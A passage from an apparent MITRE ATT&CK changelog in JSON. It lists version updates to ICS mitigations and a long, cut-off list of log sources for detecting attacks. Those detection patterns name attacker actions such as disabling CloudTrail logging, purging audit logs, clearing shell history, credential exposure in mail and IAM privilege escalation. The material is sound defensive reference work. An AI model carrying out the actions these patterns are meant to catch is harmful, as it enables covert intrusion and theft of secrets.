                    "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.  Restrict network access to only required systems and services. In addition, prevent systems from other networks or business functions (e.g., enterprise) from accessing critical process control systems. For example, in IEC 62443, systems within the same secure level should be grouped into a zone, and access to that zone is restricted by a conduit, or mechanism to restrict data flows between zones by segmenting the network. (Citation: IEC February 2019) (Citation: IEC August 2013)",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 5.1",
                        "IEC 62443-4-2:2019 - CR 5.1",
                        "NIST SP 800-53 Rev. 5 - AC-3"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0930",
                            "external_id": "M0930"
                        },
                        {
                            "source_name": "IEC August 2013",
                            "description": "IEC 2013, August Industrial communication networks - Network and system security - Part 3-3: System security requirements and security levels Retrieved. 2020/09/25 ",
                            "url": "https://webstore.iec.ch/publication/7033"
                        },
                        {
                            "source_name": "IEC February 2019",
                            "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ",
                            "url": "https://webstore.iec.ch/publication/34421"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:46:09.190000+00:00\", \"old_value\": \"2025-04-16 21:26:26.551000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-06 21:16:18.709000+00:00",
                    "modified": "2026-04-23 00:56:53.267000+00:00",
                    "name": "Out-of-Band Communications Channel",
                    "description": "Have alternative methods to support communication requirements during communication failures and data integrity attacks. (Citation: National Institute of Standards and Technology April 2013) (Citation: Defense Advanced Research Projects Agency)",
                    "revoked": false,
                    "labels": [
                        "NIST SP 800-53 Rev. 5 - SC-37"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0810",
                            "external_id": "M0810"
                        },
                        {
                            "source_name": "Defense Advanced Research Projects Agency",
                            "description": "Defense Advanced Research Projects Agency National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17  Rapid Attack Detection, Isolation and Characterization Systems (RADICS) Retrieved. 2020/09/17 ",
                            "url": "https://www.darpa.mil/program/rapid-attack-detection-isolation-and-characterization-systems"
                        },
                        {
                            "source_name": "National Institute of Standards and Technology April 2013",
                            "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ",
                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:56:53.267000+00:00\", \"old_value\": \"2025-04-16 21:26:31.696000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-06 20:54:49.964000+00:00",
                    "modified": "2026-04-23 00:57:09.061000+00:00",
                    "name": "Restrict File and Directory Permissions",
                    "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 2.1",
                        "IEC 62443-4-2:2019 - CR 2.1",
                        "NIST SP 800-53 Rev. 5 - AC-6"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0922",
                            "external_id": "M0922"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:57:09.061000+00:00\", \"old_value\": \"2025-04-16 21:26:33.651000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-06 21:16:18.709000+00:00",
                    "modified": "2026-04-23 00:55:20.765000+00:00",
                    "name": "Software Process and Device Authentication",
                    "description": "Require the authentication of devices and software processes where appropriate. Devices that connect remotely to other systems should require strong authentication to prevent spoofing of communications. Furthermore, software processes should also require authentication when accessing APIs.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 1.2",
                        "IEC 62443-4-2:2019 - CR 1.2",
                        "NIST SP 800-53 Rev. 5 - IA-3"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0813",
                            "external_id": "M0813"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:55:20.765000+00:00\", \"old_value\": \"2024-10-14 20:31:04.927000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2"
                },
                {
                    "type": "course-of-action",
                    "id": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-06 21:16:18.709000+00:00",
                    "modified": "2026-04-23 00:50:32.432000+00:00",
                    "name": "Static Network Configuration",
                    "description": "Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various AiTM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.",
                    "revoked": false,
                    "labels": [
                        "IEC 62443-3-3:2013 - SR 7.7",
                        "IEC 62443-4-2:2019 - CR 7.7",
                        "NIST SP 800-53 Rev. 5 - CM-7"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/mitigations/M0814",
                            "external_id": "M0814"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 00:50:32.432000+00:00\", \"old_value\": \"2025-04-16 21:26:28.312000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2"
                }
            ],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "datasources": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "datacomponents": {
            "additions": [],
            "major_version_changes": [
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-24 19:46:47.171000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0038",
                            "external_id": "DC0038"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Application Log Content",
                    "description": "Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples: \n\n- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).\n- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).\n- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.\n- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.\n- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "android:logcat",
                            "channel": "Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Default IME active imeId=<pkg>; frequent onStartInput/commitText calls"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Task switch from browser/custom tab to handler immediately after OAuth return"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background"
                        },
                        {
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "smtpd$.*$: .*from=[.*@internaldomain.com](mailto:.*@internaldomain.com) to=[.*@internaldomain.com](mailto:.*@internaldomain.com)"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Inbound messages with anomalous headers, spoofed SPF/DKIM failures"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Inbound emails containing hyperlinks from suspicious sources"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Inbound email attachments logged from MTAs with suspicious metadata"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "Mismatch between authenticated username and From header in email"
                        },
                        {
                            "name": "Application:Mail",
                            "channel": "High-frequency inbound mail activity to a specific recipient address"
                        },
                        {
                            "name": "ApplicationLog:API",
                            "channel": "Docker/Kubernetes API access from external sources"
                        },
                        {
                            "name": "ApplicationLog:CallRecords",
                            "channel": "Outbound or inbound calls to high-risk or blocklisted numbers"
                        },
                        {
                            "name": "ApplicationLog:EntraIDPortal",
                            "channel": "DeviceRegistration events"
                        },
                        {
                            "name": "ApplicationLog:IIS",
                            "channel": "IIS W3C logs in C:\\inetpub\\logs\\LogFiles\\W3SVC* (spikes in 5xx, RCE/SQLi/path traversal/JNDI patterns)"
                        },
                        {
                            "name": "ApplicationLog:Ingress",
                            "channel": "Kubernetes NGINX/Envoy ingress controller logs with anomalous payloads and 5xx spikes"
                        },
                        {
                            "name": "ApplicationLog:Intune/MDM Logs",
                            "channel": "Enrollment events (e.g., MDMDeviceRegistration)"
                        },
                        {
                            "name": "ApplicationLog:MailServer",
                            "channel": "Unexpected additions of sieve rules or filtering directives"
                        },
                        {
                            "name": "ApplicationLog:Outlook",
                            "channel": "Outlook client-level rule creation actions not consistent with normal user activity"
                        },
                        {
                            "name": "ApplicationLog:WebServer",
                            "channel": "/var/log/httpd/access_log, /var/log/apache2/access.log, /var/log/nginx/access.log with exploit indicators and burst errors"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "SendEmail"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "InvokeModel"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "InvokeFunction: Unexpected or repeated invocation of functions not tied to known workflows"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "CreateUser|AttachRolePolicy|CreateAccessKey|UpdateAssumeRolePolicy|CreateLoginProfile"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "StopLogging, DeleteTrail, UpdateTrail: API calls that disable or modify logging services"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Repeated crash pattern within container or instance logs"
                        },
                        {
                            "name": "AWS:CloudWatch",
                            "channel": "Elevated 5xx response rates in application logs or gateway layer"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "Add role assignment / ElevateAccess / Create service principal"
                        },
                        {
                            "name": "azure:audit",
                            "channel": "App registrations or consent grants by abnormal users or at unusual times"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "ConsentGrant: Suspicious consent grants to non-approved or unknown applications"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Modify Conditional Access Policy"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Register PTA Agent or Modify AD FS trust"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Resource access initiated using application credentials, not user accounts"
                        },
                        {
                            "name": "docker:daemon",
                            "channel": "container_create,container_start"
                        },
                        {
                            "name": "docker:events",
                            "channel": "Container exited with non-zero code repeatedly in short period"
                        },
                        {
                            "name": "docker:runtime",
                            "channel": "execution of cloud CLI tool (e.g., aws, az) inside container"
                        },
                        {
                            "name": "EDR:detection",
                            "channel": "ThreatDetected, QuarantineLog"
                        },
                        {
                            "name": "EDR:detection",
                            "channel": "ThreatLog"
                        },
                        {
                            "name": "esxi:esxupdate",
                            "channel": "/var/log/esxupdate.log contains VIB installed with `--force` or `--no-sig-check` and non-standard acceptance levels"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "/var/log/hostd.log anomalies (faults, crashes, restarts) around inbound connections"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Keywords: 'Backtrace','Signal 11','PANIC','hostd restarted','assert' or 'Service terminated unexpectedly' in /var/log/hostd.log, /var/log/vmkernel.log, /var/log/syslog.log."
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "unexpected script/command invocations via hostd"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Guest Operations API invocation: StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, InitiateFileTransferFromGuest"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "unexpected script invocations producing long encoded strings"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Host daemon command log entries related to vib enumeration"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "New extension/module install with unknown vendor ID"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "vmkernel / OpenSLP logs for malformed requests"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "Symmetric crypto routines triggered for external session"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "ESXi process initiating asymmetric handshake with external host"
                        },
                        {
                            "name": "gcp:workspaceaudit",
                            "channel": "SendAs: Outbound messages with alias identities that differ from primary account"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Secure text entry focus and editingChanged bursts not typical for the app"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Repeated canOpenURL checks across diverse schemes (\u2265N within short window)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)"
                        },
                        {
                            "name": "journald:Application",
                            "channel": "Segfault or crash log entry associated with specific application binary"
                        },
                        {
                            "name": "journald:systemd",
                            "channel": "Repeated service restart attempts or unit failures"
                        },
                        {
                            "name": "kubernetes:orchestrator",
                            "channel": "Access to orchestrator logs containing credentials (Docker/Kubernetes logs)"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "cleared or truncated .bash_history"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "usb * new|thunderbolt|pci .* added|block.*: new .* device"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Inbound messages from webmail services containing attachments or URLs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kernel|systemd messages indicating 'segmentation fault'|'core dumped'|'service terminated unexpectedly' for sshd, smbd, vsftpd, mysqld, httpd, etc."
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "System daemons initiating encrypted sessions with unexpected destinations"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "milter configuration updated, transport rule initialized, unexpected script execution"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Repetitive HTTP 408, 500, or 503 errors logged within short timeframe"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Application or browser logs (webview errors, plugin enumerations) indicating suspicious script evaluation or plugin loads"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "processes binding to non-standard ports or sshd configured on unexpected port"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "system daemons initiating TLS sessions outside expected services"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "browser/office crash, segfault, abnormal termination"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Error/warning logs from services indicating load spike or worker exhaustion"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched from_domain vs return_path_domain"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "suspicious DHCP lease assignment with unexpected DNS or gateway"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "opened document|clicked link|segfault|abnormal termination|sandbox"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Authentication attempts into finance-related servers from unusual IPs or times"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sshd sessions with unusual port forwarding parameters"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Non-standard processes negotiating SSL/TLS key exchanges"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Module registration or stacktrace logs indicating segmentation faults or unknown module errors"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Segfaults, kernel oops, or crashes in security software processes"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Emails containing cleartext secrets (password=, api_key=, token=) shared across internal/external domains"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Transport Rule Modification"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Admin Audit Logs, Transport Rules"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "MailDelivery: High-frequency delivery of messages or attachments to a single recipient"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "New-InboxRule: Automation that triggers abnormal forwarding or external link generation"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "MessageTrace logs"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "External sender message followed by user action involving links or attachments"
                        },
                        {
                            "name": "m365:mailboxaudit",
                            "channel": "Outlook rule creation or custom form deployment"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "AuthenticationDetails=fail OR SPF=fail OR DKIM=fail OR DMARC=fail"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "X-MS-Exchange-Organization-AutoForwarded"
                        },
                        {
                            "name": "m365:purview",
                            "channel": "MailItemsAccessed & Exchange Audit"
                        },
                        {
                            "name": "m365:purview",
                            "channel": "MailItemsAccessed, Search-Mailbox events"
                        },
                        {
                            "name": "m365:teams",
                            "channel": "External chat request or new tenant communication preceding approval activity"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Unusual form activity within Outlook client, including load of non-default forms"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf, MessageSend, ClickThrough, MailItemsAccessed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf, MessageSend, AttachmentPreviewed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Emails with suspicious sender domains, spoofed headers, or anomalous attachment types"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed: Access of email attachments by Office applications"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Creation or modification of inbox rule outside of normal user behavior"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Inbound emails containing embedded or shortened URLs"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "AppRegistration: Unexpected application registration or OAuth authorization"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MessageSend, MessageRead, or FileAttached events containing credential-like patterns"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-Mailbox, Add-InboxRule, RegisterWebhook"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "ConsentGranted: Abuse of application integrations to mint tokens bypassing MFA"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Application Consent grants, new OAuth client registrations, or unusual admin-level activities executed by a user account shortly after suspected drive-by compromise"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Folder configuration updated with external or HTML-formatted Home Page via Set-MailboxFolder"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "PurgeAuditLogs, Remove-MailboxAuditLog"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-CsOnlineUser or UpdateAuthPolicy"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "New-InboxRule or Set-InboxRule events recorded in Exchange Online"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Transport rule or inbox rule creation events"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "GAL Lookup or Address Book download"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Inbound emails with attachments from suspicious or spoofed senders"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "certificate added or modified in application credentials"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Unusual MFA requests or OAuth consent events temporally aligned with user-reported vishing call"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set federation settings on domain|Set domain authentication|Add federated identity provider"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf/SendAs: Emails sent where the sending identity mismatches account ownership"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-MailboxAutoReplyConfiguration: Unexpected rule changes creating impersonated replies"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "SendOnBehalf/SendAs: Office Suite initiated messages using impersonated identities"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Read-only configuration review from GUI"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Modify Federation Settings or Update Authentication Policy"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Send/Receive: Unusual spikes in inbound messages to a single recipient"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "PowerShell: Add-MailboxPermission"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Add-MailboxPermission or Set-ManagementRoleAssignment"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-PartnerOfRecord / CompanyAdministrator role assignments / New-DelegatedAdminRelationship"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Add-DelegatedAdmin, Set-PartnerOfRecord, Add-MailboxPermission, Set-OrganizationRelationship"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MailSend: Outlook messages with suspicious subject/body terms (e.g., urgent payment, wire transfer) targeting finance teams"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed, FileDownloaded, SearchQueried"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Detection of hidden macro streams or SetHiddenAttribute actions"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "RunMacro"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileUploaded or FileCopied events"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "TeamsMessageAccess, TeamsExport, ExternalAppAccess"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "TeamsMessagesAccessedViaEDiscovery, TeamsGraphMessageExport"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "ApplicationModified, ConsentGranted: Unexpected app consent or modification events linked to security evasion"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication"
                        },
                        {
                            "name": "macos:jamf",
                            "channel": "RemoteCommandExecution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Device attached|enumerated VID/PID"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Inbound email activity with suspicious domains or mismatched sender information"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "App/web server logs ingested via unified logging or filebeat (nginx/apache/node)."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Received messages with embedded or shortened URLs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Received messages containing embedded links or attachments from non-enterprise services"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process 'crashed'|'EXC_BAD_ACCESS' for sshd, screensharingd, httpd; launchd restarts of these daemons."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "opendirectoryd crashes or abnormal authentication errors"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Logs from unifiedlogging that show browser crashes, plugin enumerations, extension installs or errors around the same time as suspicious network fetches"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream cleared or truncated"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "quarantine or AV-related subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Repeated process crashes logged by CrashReporter or system instability logs in com.apple.console"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Inbound messages with attachments from suspicious domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outgoing or incoming calls with non-standard caller IDs or unusual metadata"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mail.app or third-party clients sending messages with mismatched From headers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process crash, abort, code signing violations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Configuration profile modified or new profile installed"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Crash log entries for a process receiving malformed input or known exploit patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
